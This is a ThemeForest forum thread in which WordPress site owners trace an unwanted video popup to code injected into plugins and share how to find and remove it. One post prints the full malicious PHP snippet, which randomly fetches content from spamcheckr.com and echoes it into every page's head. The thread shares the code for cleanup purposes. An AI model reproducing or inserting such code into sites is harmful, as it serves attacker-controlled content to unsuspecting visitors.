4 posts
  • 1 Year of Membership
  • Collector Level 1
bodyrehab
says

A video link https://www.youtube.com/watch?v=RFngSCaY5nA popups. Any ideas how could I clean this problem? The wp template I’m using is the Soulmedic

4379 posts
  • Affiliate Level 2
  • Beta Tester
  • Collector Level 2
  • Community Superstar
+7 more
Dzinc
says

Hi bodyrehab, welcome to ThemeForest, this is a general open forum. The appropriate support section for this item, if offered, can be found here.

Please follow the instructions provided in the link above to interact directly with the author, where he’ll be able to point you in the right direction.

In the meantime, this thread will also remain open, welcoming any/all feedback from the community, in case someone does have an accurate solution for you. Your patience is appreciated. Thanks and good luck.

1 post
  • 1 Year of Membership
  • Collector Level 1
  • Exclusive Author
johndir
says

i have the same problem redirect

7 posts
  • 5 Years of Membership
  • Collector Level 3
  • Exclusive Author
PlayaX
says

what plugins are you using?

4 posts
  • 1 Year of Membership
  • Collector Level 1
bodyrehab
says

what plugins are you using?

Thank you for your advice. I checked all the plugins and i found the link in one of them (js_composer)

The problem seems that is resolved

Thank You very much Bodyrehab

4 posts
  • 1 Year of Membership
  • Collector Level 1
bodyrehab
says
http://spamcheckr.com/l.php

For all those who have this problem Remove this link from js_composer plugin

1 post
  • 2 Years of Membership
  • Affiliate Level 1
  • Collector Level 2
  • France
mkh67
says

This wordpress.org Topic can help too !

1 post
  • 3 Years of Membership
  • Collector Level 2
  • United States
stefaanvd
says

We had this problem and it had nothing to do with the w3 cache.

This is the code you are looking for

if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}} [/code]

Download all of your site files via FTP, then download a program called ‘FileSeek’ (its free).

Set it to scan your site files for the term ‘http://spamcheckr.com/l.php'

You will find the infected files and remove the instance of ‘http://spamcheckr.com/l.php' and the surrounding malicious code.

I hope this helps someone. Good luck.

1 post
  • 3 Years of Membership
  • Collector Level 3
  • United States
wrhull
says

I found this in my viral locker plugin from http://WESMASHED.IT ( http://codecanyon.net/item/viral-lock-like-google1-or-tweet-to-unlock/1486602 ). It was located in the (plugin-directory-path)/viral-lock/js/settings_js.php file.

If you have this plugin, please look for it there.

1 post
  • 2 Years of Membership
  • Collector Level 2
barite
says

A video link https://www.youtube.com/watch?v=RFngSCaY5nA popups. Any ideas how could I clean this problem? The wp template I’m using is the Soulmedic

Download Fileseek, and find the string http://spamcheckr.com/l.php in your plug-in files.

by
by
by
by
by
by